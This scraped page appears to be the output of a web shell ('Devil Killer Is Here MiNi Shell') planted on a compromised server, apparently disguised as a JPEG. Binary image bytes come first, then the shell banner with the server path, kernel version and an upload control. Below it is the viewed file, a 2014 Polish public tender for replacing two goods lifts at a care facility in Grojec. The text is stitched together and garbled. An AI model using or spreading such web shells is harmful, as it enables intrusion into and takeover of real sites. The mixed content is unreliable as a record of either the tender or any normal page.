JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140418/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140418/133616-N-2014.html

<p class="kh_header"><b>Grojec: Przebudowa i modernizacja PZOL w Grojcu-wymiana dźwigów towarowych</b><br>
<b>Numer ogłoszenia: 133616 - 2014; data zamieszczenia: 18.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Zakłady Opiekuńczo-Lecznicze w Grojcu , Aleja Ogrodowa 1, 32-615 Grojec, woj. małopolskie, tel. 33 8428136, faks 33 8428903.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzol.cba.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i modernizacja PZOL w Grojcu-wymiana dźwigów towarowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> a)dostawa, montaż i konserwacja/serwis wraz z usuwaniem awarii w okresie udzielonej gwarancji, fabrycznie nowych dźwigów towarowych w ilości 2 szt. w budynku głównym PZOL w Grojcu, Aleja Ogrodowa 1, 32-615 Grojec,
b)demontaż istniejących 2 szt dźwigów towarowych, 2 szt maszynowni i 2 szt urządzeń szybowych,  7 szt drzwi szybowych,
c)wykonanie wszelkich czynności związanych z uzyskaniem decyzji Urzędu Dozoru Technicznego zezwalającej na dopuszczenie do eksploatacji zamontowanych dźwigów. 
d)Wykonawca będzie realizował czynności konserwacji i serwisu w okresie udzielonej gwarancji i rękojmi tj.przez okres 3 lat od daty dokonania przez Zamawiającego odbioru końcowego przedmiotu umowy bez uwag. Elementem dokumentacji odbioru przekazanej Zamawiającemu przez Wykonawcę w trakcie czynności odbioru końcowego będzie decyzja Urzędu Dozoru Technicznego zezwalająca na eksploatację urządzeń.

3.Wspólny słownik zamówień (CPV): 45.31.31.00-5-instalowanie wind

4.Stan istniejący:                                             
a) dźwigi towarowe:
	Dźwig nr 1	Dźwig nr 2
Typ	Towarowy (Pakietowy)PAE nr fabryczny 35812 rok produkcji 1983	Towarowy(Pakietowy)PAE nr fabryczny 43523 rok produkcji 1983
Udźwig	100 kg	100 kg
Ilość przystanków	3	3
Ilość dojść	3	4
Wysokość podnoszenia (m)	6 mb	6 mb
Rodzaj sterowania	zewnętrzne wg schematu EO-219	zewnętrzne wg schematu EO-219
Kabina	Nieprzelotowa z wyjmowaną półką.
 Ciężar 83 kg
Metalowa	Przelotowa z wyjmowaną półką
Ciężar 83 kg
Metalowa
Szer x głębokość x wys. (mm)
	1000 x 1000 x 800	1000 x 1000 x 800
Wymiary szybu
szer x głębokość	1320 x 1180	1320 x 1180
Drzwi przystankowe 	Gilotynowe 3 szt o szer.600mm
próg drzwi na wysokości 800mm	Gilotynowe 4 szt o szer.600 mm
próg drzwi na wysokości 800mm
Nadszybie (mm)	2800	2800
Maszynownia	Górna w szybie  	Górna w szybie
Napęd	Reduktorowy	Reduktorowy
Szyb	Betonowy-murowany	Betonowy-murowany
b)Przystanki z otworami drzwiowymi:
Drzwi gilotynowe znajdują się we wnękach, których szpalety są o głębokości 25 cm. Szpalety i ściany wokół wnęk wyłożone są płytkami ceramicznymi:
a) 3 wnęki o wymiarach 90x100 cm posiadają płytki ceramiczne o wymiarach 20x25 cm
b) 4 wnęki o wymiarach 90x110 cm posiadają płytki ceramiczne o wymiarach 15x15 cm
c)Maszynownia o wymiarach 130x150x150 - szt.2
5.Klasyfikacja budynku:   kategoria zagrożenia ludzi ZL II

6.Zakres prac obejmować będzie:
a)roboty demontażowe-demontaż 2 szt.dźwigów towarowych, 2 szt maszynowni i 2 szt urządzeń szybowych,  7 szt drzwi szybowych,
b)wywóz złomu i gruzu na koszt Wykonawcy, 
c)zabezpieczenie szybów na czas prowadzonych prac, 
d)dostawa i montaż 2 szt. dźwigów towarowych fabrycznie nowych o parametrach technicznych:
	Dźwig nr 1	Dźwig nr 2
Typ	Towarowy	Towarowy
Udźwig (kg)	100 kg	100 kg
Prędkość (m/s)	0,45	0,45
Ilość przystanków	3	3
Ilość dojść	3	4
Wysokość podnoszenia (m)	6	6
Kabina	Nieprzelotowa z wyjmowaną półką	Przelotowa z wyjmowaną półką
Szer x głębokość x wys. (mm)	1000 x 1000 x 800	1000 x 1000 x 800
Wymiary szybu
szer x głębokość	1320 x 1180	1320 x 1180
Drzwi szybowe	Gilotynowe 3 szt
próg drzwi na wysokości 800mm	Gilotynowe 4 szt
próg drzwi na wysokości 800mm
Nadszybie (mm)	2800	2800
Maszynownia	Górna w szybie	Górna w szybie
Napęd	Reduktorowy	Reduktorowy
Moc silnika (KW)	0,7	0,7
Ilość startów	30/godz	30/godz
Zasilanie	Prąd trójfazowy 3x380V 50hz	Prąd trójfazowy 3x380V 50hz
Temp pracy (oC)	+5 max +40	+5 max +40
UWAGA : Drzwi szybowe i do maszynowni wykonane ze stali nierdzewnej KORN 240

e) roboty budowlane związane z:
- wymianą drzwi gilotynowych-uzupełnienie glazury w podobnych do istniejących kolorach (na 7 przystankach),
- uzupełnienie ubytków tynku, gruntowanie i dwukrotne malowanie 2 szt szybów i 2 szt. maszynowni, 
f)Zamawiający wymaga, aby Wykonawca na własny koszt dopełnił wszelkich formalności w celu uzyskania decyzji Urzędu Dozoru Technicznego zezwalającej Zamawiającemu na eksploatację zamontowanych dźwigów, w tym sporządził niezbędną dokumentację techniczną, wykonał wszelkie wymagane przepisami pomiary, uzyskał niezbędne certyfikaty i uzgodnienia. Wykonawca ponosi również koszty opłat związanych z badaniem UDT przed dopuszczeniem dźwigów do eksploatacji. Zamawiający wymaga również, aby Wykonawca w dniu odbioru końcowego robót przekazał Zamawiającemu 2 egz. dokumentacji powykonawczej zatwierdzonej przez Urząd Dozoru Technicznego.
g)Zamawiający wymaga, aby wykonawca przeprowadził szkolenie z obsługi zamontowanych dźwigów dla pracowników Zamawiającego w terminie uzgodnionym obustronnie.
h)wymagany termin gwarancji: minimum 36 miesięcy od daty końcowego odbioru przedmiotu umowy.
i) wymagany termin rękojmi: minimum 36 miesięcy od daty końcowego odbioru przedmiotu umowy.


7.Wymagania w zakresie konserwacji-serwisu oraz usuwania awarii dźwigów w okresie gwarancji:
a)Zamawiający wymaga udzielenie gwarancji i rękojmi na całość przedmiotu zamówienia na okres minimum 36 miesięcy. Okres gwarancji i rękojmi będzie liczony od daty dokonania przez Zamawiającego odbioru końcowego przedmiotu umowy bez uwag,
b)w okresie gwarancji Wykonawca będzie realizował na własny koszt czynności serwisowe, konserwacyjne, ewentualne naprawy i usuwanie powstałych awarii,
c)w okresie gwarancji Wykonawca będzie również na własny koszt wykonywał przeglądy i pomiary dźwigu (w tym pomiary elektryczne) w terminach i zakresach określonych przez producenta, wymaganych przez Urząd Dozoru Technicznego i obowiązujące przepisy prawa,
d)w dniu odbioru końcowego przedmiotu umowy Wykonawca przekaże Zamawiającemu harmonogram konserwacji-serwisu dźwigów w okresie  udzielonej gwarancji i rękojmi.

8.Wizja lokalna:
a)Wykonawca przed sporządzeniem oferty cenowej może dokonać wizji lokalnej, gdzie mają być prowadzone prace i sporządzić pomiary z natury,
b)Zamawiający umożliwi wszystkim Wykonawcom w wyznaczonym przez siebie terminie przeprowadzenia wizji lokalnej PZOL w Grojcu oraz wgląd w dokumentację techniczną istniejących dźwigów towarowych. 
c)koszt dokonania wizji lokalnej ponosi Wykonawca,
d)osobą wyznaczoną do kontaktu z Wykonawcami w przedmiotowej sprawie jest
Pan Jacek Narecki, dział administracyjno-gospodarczy, pokój nr 9, tel.33/8428-136, tel.kom.507260969.

9.Pozostałe wymagania:
Zamawiający wymaga, aby prowadzone prace w zakresie demontażu istniejącego i montażu nowych dźwigów  wraz z robotami towarzyszącymi nie zakłócały bieżącego funkcjonowania oddziałów PZOL w Grojcu.

10.Przepisy prawne:
Demontaż istniejących oraz dostawa nowych dźwigów wraz z montażem powinna zostać wykonana zgodnie z:
a)rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 29 października 2003r w sprawie warunków technicznych dozoru technicznego a w zakresie eksploatacji niektórych urządzeń transportu bliskiego (Dz.U z 2003r nr 193 poz.1890),
b)rozporządzeniem Ministra Gospodarki z dnia 8 grudnia 2005r w sprawie zasadniczych wymagań dla dźwigów i ich elementów bezpieczeństwa (Dz.U z 2005r nr 263 poz.2198 ze zm.),
-instrukcjami producentów dźwigów, zapewniając niezawodność i bezpieczeństwo funkcjonowania..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje skorzystanie z prawa do udzielania z wolnej ręki zamówienia uzupełniającego na podstawie art.67 ust.1 pkt 6 ustawy PZP do 50% wartości zamówienia podstawowego w okresie 3 lat od udzielenia zamówienia podstawowego dotychczasowemu wykonawcy robót polegających na powtórzeniu tego samego rodzaju zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.31.31.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 97.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości:
1000 złotych
Słownie:  jeden tysiąc  złotych
Wadium wnosi się przed upływem terminu składania ofert.
Wadium może być wniesione w jednej lub kilku następujących formach:
       -pieniądzu,
       -poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,  z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
       -gwarancjach bankowych;
       -gwarancjach ubezpieczeniowych;
       -poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust. 5 pkt 2 ustawy z  dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz.U. z 2007r Nr 42, poz.275.
Wadium wnoszone w pieniądzu wpłacić należy przelewem na rachunek bankowy: 
ING Bank Śląski 74 1050 1445 1000 0090 3022 6808
W przypadku wniesienia wadium w innej formie niż pieniądz należy go -oryginał złożyć w dziale finansowym pokój nr 3 w Powiatowych Zakładach Opiekuńczo-Leczniczych w Grojcu, Al.Ogrodowa 1 , 32-615 Grojec.
Potwierdzenie wpłacenia lub wadium w innej formie niż pieniądz należy złożyć w formie uwierzytelnionej kserokopii w osobnej kopercie z napisem -Potwierdzenie wpłaty wadium wraz z ofertą w dziale finansowym pokój nr 3 Powiatowych Zakładach Opiekuńczo-Leczniczych w Grojcu, Al.Ogrodowa 1.
Wadium zostanie zwrócone zgodnie art.46 ustawy PZP.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 ustawy Pzp  nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
-odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca posiadał uprawnienia do modernizacji, naprawy dźwigów wydanych przez UDT zgodnie z art.9 ust.1,2 i 4 ustawy z dnia 21 grudnia 2000r o dozorze technicznym (Dz.U nr 122 poz.1321).
Ocena spełnienia tego warunku wg reguły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2).W celu wskazania spełnienia warunku posiadania wiedzy i doświadczenia-  Wykonawca powinien wykazać, że wykonał należycie , zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie- minimum dwóch (2) robót budowlanych podobnych do objętych przedmiotem zamówienia. Za roboty budowlane podobne do objętej niniejszym postępowaniem Zamawiający uznaje wykonanie co najmniej dwóch robot polegających na wykonaniu montażu lub modernizacji dźwigów- z wykorzystaniem wzoru stanowiącego załącznik nr 3 do SIWZ.
Ocena spełnienia tego warunku wg reguły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku , uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu zawartych w art. 22 ust. 1 ustawy PZP- załącznik nr 4 do SIWZ oraz osobami zdolnymi do wykonania zamówienia.
Ocena spełnienia tego warunku wg reguły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca dysponował lub będzie dysponował 3 osobami posiadającymi:
-uprawnienia pracowników do konserwacji urządzeń transportu bliskiego kat.I,
-świadectwo kwalifikacyjne SEP kat.E do 1KV i pomiarów ochronnych,
-świadectwo kwalifikacyjne SEP kat.D do 1KV i pomiarów ochronnych.
wykorzystaniem wzoru stanowiącego załącznik nr 5 do SIWZ.
Ocena spełnienia tego warunku wg reguły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wskazania przez Wykonawcę umowy ubezpieczeniowej od odpowiedzialności cywilnej w zakresie  przedmiotu umowy oraz tytułu szkód,  które mogą zaistnieć w związku ze zdarzeniami losowymi związanymi z realizacją zamówienia , na kwotę nie mniejszą niż 200.000,00zł, (dwieścietysięcyzłotych).  Wykonawca odpowiada za ewentualne szkody wyrządzone zamawiającemu wynikłe w związku z realizowanym zamówieniem.Ocena spełnienia tego warunku wg reguły spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wykaz tych części zamówienia, których wykonanie wykonawca zamierza zlecić podwykonawcy-wg załącznika nr 8 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>w następującym zakresie:
1)zmiany terminu zakończenia robót z uwagi na:
